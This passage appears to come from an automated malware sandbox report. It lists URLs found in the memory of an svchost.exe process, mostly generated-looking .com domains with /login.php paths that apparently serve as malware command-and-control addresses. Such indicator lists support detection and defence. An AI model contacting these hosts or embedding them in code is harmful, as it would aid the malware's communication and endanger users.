    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywad.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501299413.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywaj.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php8
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygyn.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2782047194.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryler.com/login.php
    Source: svchost.exe, 00000001.00000003.2508205783.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504504034.0000000007239000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2792642908.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2503661966.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505675596.0000000007241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507955188.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507383572.000000000724E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrymuj.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590737779.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599822074.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2576640143.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynux.com/login.php8
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763990906.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrytun.com/
    Source: svchost.exe, 00000001.00000003.2811743937.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2806806539.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815662104.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819179074.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808913849.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809323268.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxyd.com/
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2229330427.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2198716545.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybyv.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477822370.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771384129.0000000007253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
    Source: svchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535357779.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2842904023.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856628497.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837121931.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582941413.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2850230892.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988415844.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860881209.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
    Source: svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589901555.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590120821.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588954366.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589741784.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufymiv.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767316843.000000000721A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507889321.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufytev.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570797195.0000000005F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufytip.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybyq.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545922142.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyduv.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815248355.00000000072DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814952372.000000000724D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygaq.com/
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2847936839.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
    Source: svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2806806539.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjup.com/ww25.lyxynyx.com
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2765596647.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766830441.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2764622957.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2761539711.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762452123.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2704766702.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2734882543.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737092972.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujymip.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557868147.0000000005F18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujypal.com/login.php
